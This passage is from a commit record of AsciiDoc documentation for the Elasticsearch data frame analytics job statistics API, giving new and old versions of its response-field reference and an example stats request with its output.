`hyperparameters`\n[%collapsible%open]\n=======\n`alpha`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-alpha]\n\n`class_assignment_objective`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=class-assignment-objective]\n\n`downsample_factor`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-downsample-factor]\n\n`eta`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`eta_growth_rate_per_tree`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-eta-growth]\n\n`feature_bag_fraction`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_attempts_to_add_tree`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-attempts]\n\n`max_optimization_rounds_per_hyperparameter`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-optimization-rounds]\n\n`max_trees`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_folds`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-folds]\n\n`num_splits_per_feature`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-splits]\n\n`soft_tree_depth_limit`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-limit]\n\n`soft_tree_depth_tolerance`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-tolerance]\n=======\n\/\/End class_hyperparameters\n\n`iteration`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-iteration]\n\n`timestamp`::::\n(date)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timestamp]\n\n\/\/Begin class_timing_stats\n`timing_stats`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats]\n+\n.Properties of `timing_stats`\n[%collapsible%open]\n=======\n`elapsed_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed]\n\n`iteration_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-iteration]\n=======\n\/\/End class_timing_stats\n\n\/\/Begin class_validation_loss\n`validation_loss`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss]\n+\n.Properties of `validation_loss`\n[%collapsible%open]\n=======\n`fold_values`::::\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-fold]\n\n`loss_type`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-type]\n=======\n\/\/End class_validation_loss\n======\n\/\/End classification_stats\n\n\/\/Begin outlier_detection_stats\n`outlier_detection_stats`::::\n(object)\nAn object containing information about the {oldetection} job.\n+\n.Properties of `outlier_detection_stats`\n[%collapsible%open]\n======\n\/\/Begin parameters\n`parameters`::::\n(object)\nThe list of job parameters specified by the user or determined by algorithmic \nheuristics.\n+\n.Properties of 
`parameters`\n[%collapsible%open]\n=======\n`compute_feature_influence`::::\n(boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=compute-feature-influence]\n\n`feature_influence_threshold`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=feature-influence-threshold]\n\n`method`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=method]\n\n`n_neighbors`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=n-neighbors]\n\n`outlier_fraction`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=outlier-fraction]\n\n`standardization_enabled`::::\n(boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=standardization-enabled]\n=======\n\/\/End parameters\n\n`timestamp`::::\n(date)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timestamp]\n\n\/\/Begin od_timing_stats\n`timing_stats`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats]\n+\n.Property of `timing_stats`\n[%collapsible%open]\n=======\n`elapsed_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed]\n=======\n\/\/End od_timing_stats\n======\n\/\/End outlier_detection_stats\n\n\/\/Begin regression_stats\n`regression_stats`::::\n(object)\nAn object containing information about the {reganalysis} job.\n+\n.Properties of `regression_stats`\n[%collapsible%open]\n======\n\/\/Begin reg_hyperparameters\n`hyperparameters`::::\n(object)\nAn object containing the parameters of the {reganalysis} job.\n+\n.Properties of `hyperparameters`\n[%collapsible%open]\n=======\n`alpha`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-alpha]\n\n`downsample_factor`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-downsample-factor]\n\n`eta`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`eta_growth_rate_per_tree`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-eta-growth]\n\n`feature_bag_fraction`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_attempts_to_add_tree`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-attempts]\n\n`max_optimization_rounds_per_hyperparameter`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-optimization-rounds]\n\n`max_trees`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_folds`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-folds]\n\n`num_splits_per_feature`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-splits]\n\n`soft_tree_depth_limit`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-limit]\n\n`soft_tree_depth_tolerance`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-tolerance]\n=======\n\/\/End reg_hyperparameters\n\n`iteration`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-iteration]\n\n`timestamp`::::\n(date)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timestamp]\n\n\/\/Begin reg_timing_stats\n`timing_stats`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats]\n+\n.Properties of 
`timing_stats`\n[%collapsible%open]\n=======\n`elapsed_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed]\n\n`iteration_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-iteration]\n=======\n\/\/End reg_timing_stats\n\n\/\/Begin reg_validation_loss\n`validation_loss`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss]\n+\n.Properties of `validation_loss`\n[%collapsible%open]\n=======\n`fold_values`::::\n(array of strings)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-fold]\n\n`loss_type`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-type]\n=======\n\/\/End reg_validation_loss\n======\n\/\/End regression_stats\n=====\n\/\/End analysis_stats\n\n`assignment_explanation`:::\n(string)\nFor running jobs only, contains messages relating to the selection of a node to \nrun the job.\n\n\/\/Begin data_counts\n`data_counts`:::\n(object)\nAn object that provides counts for the quantity of documents skipped, used in\ntraining, or available for testing.\n+\n.Properties of `data_counts`\n[%collapsible%open]\n=====\n`skipped_docs_count`::::\n(integer)\nThe number of documents that are skipped during the analysis because they \ncontained values that are not supported by the analysis. For example, \n{oldetection} does not support missing fields so it skips documents with missing \nfields. Likewise, all types of analysis skip documents that contain arrays with \nmore than one element.\n\n`test_docs_count`::::\n(integer)\nThe number of documents that are not used for training the model and can be used \nfor testing.\n\n`training_docs_count`::::\n(integer)\nThe number of documents that are used for training the model.\n=====\n\/\/End data_counts\n\n`id`:::\n(string)\nThe unique identifier of the {dfanalytics-job}.\n\n`memory_usage`:::\n(Optional, object)\nAn object describing memory usage of the analytics. It is present only after the \njob is started and memory usage is reported.\n+\n.Properties of `memory_usage`\n[%collapsible%open]\n=====\n`memory_reestimate_bytes`::::\n(long)\nThis value is present when the `status` is `hard_limit` and it\nis a new estimate of how much memory the job needs.\n\n`peak_usage_bytes`::::\n(long)\nThe number of bytes used at the highest peak of memory usage.\n\n`status`::::\n(string)\nThe memory usage status. May have one of the following values:\n+\n--\n* `ok`: usage stayed below the limit.\n* `hard_limit`: usage surpassed the configured memory limit.\n--\n\n`timestamp`::::\n(date)\nThe timestamp when memory usage was calculated.\n=====\n\n`node`:::\n(object)\nContains properties for the node that runs the job. This information is \navailable only for running jobs.\n+\n.Properties of `node`\n[%collapsible%open]\n=====\n`attributes`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-attributes]\n\n`ephemeral_id`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-ephemeral-id]\n\n`id`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-id]\n\n`name`::::\n(string)\nThe node name.\n\n`transport_address`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-transport-address]\n=====\n\n`progress`:::\n(array) The progress report of the {dfanalytics-job} by phase.\n+\n.Properties of phase objects\n[%collapsible%open]\n=====\n`phase`::::\n(string) Defines the phase of the {dfanalytics-job}. 
Possible phases: \n* `reindexing`, \n* `loading_data`, \n* `computing_outliers` (for {oldetection} only),\n* `feature_selection` (for {regression} and {classification} only),\n* `coarse_parameter_search` (for {regression} and {classification} only),\n* `fine_tuning_parameters` (for {regression} and {classification} only),\n* `final_training` (for {regression} and {classification} only),\n* `writing_results`,\n* `inference` (for {regression} and {classification} only).\n+\nTo learn more about the different phases, refer to\n{ml-docs}\/ml-dfa-phases.html[How a {dfanalytics} job works].\n \n`progress_percent`::::\n(integer) The progress that the {dfanalytics-job} has made expressed in \npercentage.\n=====\n\n`state`:::\n(string) The status of the {dfanalytics-job}, which can be one of the following\nvalues: `analyzing`, `failed`, `reindexing`, `started`, `starting`,`stopping`, \n`stopped`.\n====\n\/\/End of data_frame_analytics\n\n\n[[ml-get-dfanalytics-stats-response-codes]]\n== {api-response-codes-title}\n\n`404` (Missing resources)::\n If `allow_no_match` is `false`, this code indicates that there are no\n resources that match the request or only partial matches for the request.\n\n\n[[ml-get-dfanalytics-stats-example]]\n== {api-examples-title}\n\nThe following API retrieves usage information for the\n{ml-docs}\/ecommerce-outliers.html[{oldetection} {dfanalytics-job} example]:\n\n[source,console]\n--------------------------------------------------\nGET _ml\/data_frame\/analytics\/ecommerce\/_stats\n--------------------------------------------------\n\/\/ TEST[skip:Kibana sample data]\n\n[source,console-result]\n----\n{\n \"count\" : 1,\n \"data_frame_analytics\" : [\n {\n \"id\" : \"ecommerce\",\n \"state\" : \"stopped\",\n \"progress\" : [\n {\n \"phase\" : \"reindexing\",\n \"progress_percent\" : 100\n },\n {\n \"phase\" : \"loading_data\",\n \"progress_percent\" : 100\n },\n {\n \"phase\" : \"analyzing\",\n \"progress_percent\" : 100\n },\n {\n \"phase\" : \"writing_results\",\n \"progress_percent\" : 100\n }\n ],\n \"data_counts\" : {\n \"training_docs_count\" : 3321,\n \"test_docs_count\" : 0,\n \"skipped_docs_count\" : 0\n },\n \"memory_usage\" : {\n \"timestamp\" : 1586905058000,\n \"peak_usage_bytes\" : 279484\n },\n \"analysis_stats\" : {\n \"outlier_detection_stats\" : {\n \"timestamp\" : 1586905058000,\n \"parameters\" : {\n \"n_neighbors\" : 0,\n \"method\" : \"ensemble\",\n \"compute_feature_influence\" : true,\n \"feature_influence_threshold\" : 0.1,\n \"outlier_fraction\" : 0.05,\n \"standardization_enabled\" : true\n },\n \"timing_stats\" : {\n \"elapsed_time\" : 245\n }\n }\n }\n }\n ]\n}\n----\n","old_contents":"[role=\"xpack\"]\n[testenv=\"platinum\"]\n[[get-dfanalytics-stats]]\n= Get {dfanalytics-jobs} statistics API\n[subs=\"attributes\"]\n++++\n<titleabbrev>Get {dfanalytics-jobs} stats<\/titleabbrev>\n++++\n\nRetrieves usage information for {dfanalytics-jobs}.\n\nexperimental[]\n\n[[ml-get-dfanalytics-stats-request]]\n== {api-request-title}\n\n`GET _ml\/data_frame\/analytics\/<data_frame_analytics_id>\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/<data_frame_analytics_id>,<data_frame_analytics_id>\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/_all\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/*\/_stats`\n\n\n[[ml-get-dfanalytics-stats-prereq]]\n== {api-prereq-title}\n\nIf the {es} {security-features} are enabled, you must have the following \nprivileges:\n\n* cluster: `monitor_ml`\n \nFor more information, see 
<<security-privileges>> and {ml-docs-setup-privileges}.\n\n[[ml-get-dfanalytics-stats-path-params]]\n== {api-path-parms-title}\n\n`<data_frame_analytics_id>`::\n(Optional, string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=job-id-data-frame-analytics-default]\n\n\n[[ml-get-dfanalytics-stats-query-params]]\n== {api-query-parms-title}\n\n`allow_no_match`::\n(Optional, boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=allow-no-match]\n\n`from`::\n(Optional, integer) \ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=from]\n\n`size`::\n(Optional, integer) \ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=size]\n\n`verbose`::\n(Optional, boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=verbose]\n\n[role=\"child_attributes\"]\n[[ml-get-dfanalytics-stats-response-body]]\n== {api-response-body-title}\n\n`data_frame_analytics`::\n(array)\nAn array of objects that contain usage information for {dfanalytics-jobs}, which\nare sorted by the `id` value in ascending order.\n+\n.Properties of {dfanalytics-job} usage resources\n[%collapsible%open]\n====\n\/\/Begin analysis_stats\n`analysis_stats`:::\n(object)\nAn object containing information about the analysis job.\n+\n.Properties of `analysis_stats`\n[%collapsible%open]\n=====\n\/\/Begin classification_stats\n`classification_stats`::::\n(object)\nAn object containing information about the {classanalysis} job.\n+\n.Properties of `classification_stats`\n[%collapsible%open]\n======\n\/\/Begin class_hyperparameters\n`hyperparameters`::::\n(object)\nAn object containing the parameters of the {classanalysis} job.\n+\n.Properties of `hyperparameters`\n[%collapsible%open]\n=======\n`alpha`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-alpha]\n\n`class_assignment_objective`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=class-assignment-objective]\n\n`downsample_factor`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-downsample-factor]\n\n`eta`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`eta_growth_rate_per_tree`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-eta-growth]\n\n`feature_bag_fraction`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_attempts_to_add_tree`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-attempts]\n\n`max_optimization_rounds_per_hyperparameter`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-optimization-rounds]\n\n`max_trees`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_folds`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-folds]\n\n`num_splits_per_feature`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-splits]\n\n`soft_tree_depth_limit`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-limit]\n\n`soft_tree_depth_tolerance`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-tolerance]\n=======\n\/\/End class_hyperparameters\n\n`iteration`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-iteration]\n\n`timestamp`::::\n(date)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timestamp]\n\n\/\/Begin 
class_timing_stats\n`timing_stats`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats]\n+\n.Properties of `timing_stats`\n[%collapsible%open]\n=======\n`elapsed_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed]\n\n`iteration_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-iteration]\n=======\n\/\/End class_timing_stats\n\n\/\/Begin class_validation_loss\n`validation_loss`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss]\n+\n.Properties of `validation_loss`\n[%collapsible%open]\n=======\n`fold_values`::::\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-fold]\n\n`loss_type`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-type]\n=======\n\/\/End class_validation_loss\n======\n\/\/End classification_stats\n\n\/\/Begin outlier_detection_stats\n`outlier_detection_stats`::::\n(object)\nAn object containing information about the {oldetection} job.\n+\n.Properties of `outlier_detection_stats`\n[%collapsible%open]\n======\n\/\/Begin parameters\n`parameters`::::\n(object)\nThe list of job parameters specified by the user or determined by algorithmic \nheuristics.\n+\n.Properties of `parameters`\n[%collapsible%open]\n=======\n`compute_feature_influence`::::\n(boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=compute-feature-influence]\n\n`feature_influence_threshold`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=feature-influence-threshold]\n\n`method`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=method]\n\n`n_neighbors`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=n-neighbors]\n\n`outlier_fraction`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=outlier-fraction]\n\n`standardization_enabled`::::\n(boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=standardization-enabled]\n=======\n\/\/End parameters\n\n`timestamp`::::\n(date)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timestamp]\n\n\/\/Begin od_timing_stats\n`timing_stats`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats]\n+\n.Property of `timing_stats`\n[%collapsible%open]\n=======\n`elapsed_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed]\n=======\n\/\/End od_timing_stats\n======\n\/\/End outlier_detection_stats\n\n\/\/Begin regression_stats\n`regression_stats`::::\n(object)\nAn object containing information about the {reganalysis} job.\n+\n.Properties of `regression_stats`\n[%collapsible%open]\n======\n\/\/Begin reg_hyperparameters\n`hyperparameters`::::\n(object)\nAn object containing the parameters of the {reganalysis} job.\n+\n.Properties of 
`hyperparameters`\n[%collapsible%open]\n=======\n`alpha`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-alpha]\n\n`downsample_factor`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-downsample-factor]\n\n`eta`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`eta_growth_rate_per_tree`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-eta-growth]\n\n`feature_bag_fraction`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_attempts_to_add_tree`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-attempts]\n\n`max_optimization_rounds_per_hyperparameter`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-max-optimization-rounds]\n\n`max_trees`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_folds`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-folds]\n\n`num_splits_per_feature`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-num-splits]\n\n`soft_tree_depth_limit`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-limit]\n\n`soft_tree_depth_tolerance`::::\n(double)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-soft-tolerance]\n=======\n\/\/End reg_hyperparameters\n\n`iteration`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-iteration]\n\n`timestamp`::::\n(date)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timestamp]\n\n\/\/Begin reg_timing_stats\n`timing_stats`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats]\n+\n.Propertis of `timing_stats`\n[%collapsible%open]\n=======\n`elapsed_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed]\n\n`iteration_time`::::\n(integer)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-timing-stats-iteration]\n=======\n\/\/End reg_timing_stats\n\n\/\/Begin reg_validation_loss\n`validation_loss`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss]\n+\n.Properties of `validation_loss`\n[%collapsible%open]\n=======\n`fold_values`::::\n(array of strings)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-fold]\n\n`loss_type`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=dfas-validation-loss-type]\n=======\n\/\/End reg_validation_loss\n======\n\/\/End regression_stats\n=====\n\/\/End analysis_stats\n\n`assignment_explanation`:::\n(string)\nFor running jobs only, contains messages relating to the selection of a node to \nrun the job.\n\n\/\/Begin data_counts\n`data_counts`:::\n(object)\nAn object that provides counts for the quantity of documents skipped, used in\ntraining, or available for testing.\n+\n.Properties of `data_counts`\n[%collapsible%open]\n=====\n`skipped_docs_count`::::\n(integer)\nThe number of documents that are skipped during the analysis because they \ncontained values that are not supported by the analysis. For example, \n{oldetection} does not support missing fields so it skips documents with missing \nfields. 
Likewise, all types of analysis skip documents that contain arrays with \nmore than one element.\n\n`test_docs_count`::::\n(integer)\nThe number of documents that are not used for training the model and can be used \nfor testing.\n\n`training_docs_count`::::\n(integer)\nThe number of documents that are used for training the model.\n=====\n\/\/End data_counts\n\n`id`:::\n(string)\nThe unique identifier of the {dfanalytics-job}.\n\n`memory_usage`:::\n(Optional, object)\nAn object describing memory usage of the analytics. It is present only after the \njob is started and memory usage is reported.\n+\n.Properties of `memory_usage`\n[%collapsible%open]\n=====\n`memory_reestimate_bytes`::::\n(long)\nThis value is present when the `status` is `hard_limit` and it\nis a new estimate of how much memory the job needs.\n\n`peak_usage_bytes`::::\n(long)\nThe number of bytes used at the highest peak of memory usage.\n\n`status`::::\n(string)\nThe memory usage status. May have one of the following values:\n+\n--\n* `ok`: usage stayed below the limit.\n* `hard_limit`: usage surpassed the configured memory limit.\n--\n\n`timestamp`::::\n(date)\nThe timestamp when memory usage was calculated.\n=====\n\n`node`:::\n(object)\nContains properties for the node that runs the job. This information is \navailable only for running jobs.\n+\n.Properties of `node`\n[%collapsible%open]\n=====\n`attributes`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-attributes]\n\n`ephemeral_id`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-ephemeral-id]\n\n`id`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-id]\n\n`name`::::\n(string)\nThe node name.\n\n`transport_address`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-transport-address]\n=====\n\n`progress`:::\n(array) The progress report of the {dfanalytics-job} by phase.\n+\n.Properties of phase objects\n[%collapsible%open]\n=====\n`phase`::::\n(string) Defines the phase of the {dfanalytics-job}. 
Possible phases: \n* `reindexing`, \n* `loading_data`, \n* `computing_outliers` (for {oldetection} only),\n* `feature_selection` (for {regression} and {classification} only),\n* `coarse_parameter_search` (for {regression} and {classification} only),\n* `fine_tuning_parameters` (for {regression} and {classification} only),\n* `final_training` (for {regression} and {classification} only),\n* `writing_results`.\n+\nTo learn more about the different phases, refer to\n{ml-docs}\/ml-dfa-phases.html[How a {dfanalytics} job works].\n \n`progress_percent`::::\n(integer) The progress that the {dfanalytics-job} has made expressed in \npercentage.\n=====\n\n`state`:::\n(string) The status of the {dfanalytics-job}, which can be one of the following\nvalues: `analyzing`, `failed`, `reindexing`, `started`, `starting`,`stopping`, \n`stopped`.\n====\n\/\/End of data_frame_analytics\n\n\n[[ml-get-dfanalytics-stats-response-codes]]\n== {api-response-codes-title}\n\n`404` (Missing resources)::\n If `allow_no_match` is `false`, this code indicates that there are no\n resources that match the request or only partial matches for the request.\n\n\n[[ml-get-dfanalytics-stats-example]]\n== {api-examples-title}\n\nThe following API retrieves usage information for the\n{ml-docs}\/ecommerce-outliers.html[{oldetection} {dfanalytics-job} example]:\n\n[source,console]\n--------------------------------------------------\nGET _ml\/data_frame\/analytics\/ecommerce\/_stats\n--------------------------------------------------\n\/\/ TEST[skip:Kibana sample data]\n\n[source,console-result]\n----\n{\n \"count\" : 1,\n \"data_frame_analytics\" : [\n {\n \"id\" : \"ecommerce\",\n \"state\" : \"stopped\",\n \"progress\" : [\n {\n \"phase\" : \"reindexing\",\n \"progress_percent\" : 100\n },\n {\n \"phase\" : \"loading_data\",\n \"progress_percent\" : 100\n },\n {\n \"phase\" : \"analyzing\",\n \"progress_percent\" : 100\n },\n {\n \"phase\" : \"writing_results\",\n \"progress_percent\" : 100\n }\n ],\n \"data_counts\" : {\n \"training_docs_count\" : 3321,\n \"test_docs_count\" : 0,\n \"skipped_docs_count\" : 0\n },\n \"memory_usage\" : {\n \"timestamp\" : 1586905058000,\n \"peak_usage_bytes\" : 279484\n },\n \"analysis_stats\" : {\n \"outlier_detection_stats\" : {\n \"timestamp\" : 1586905058000,\n \"parameters\" : {\n \"n_neighbors\" : 0,\n \"method\" : \"ensemble\",\n \"compute_feature_influence\" : true,\n \"feature_influence_threshold\" : 0.1,\n \"outlier_fraction\" : 0.05,\n \"standardization_enabled\" : true\n },\n \"timing_stats\" : {\n \"elapsed_time\" : 245\n }\n }\n }\n }\n ]\n}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"67461ca987020752ce5d2b6f5082de8790cb1058","subject":"fix: hybrid architecture picture","message":"fix: hybrid architecture 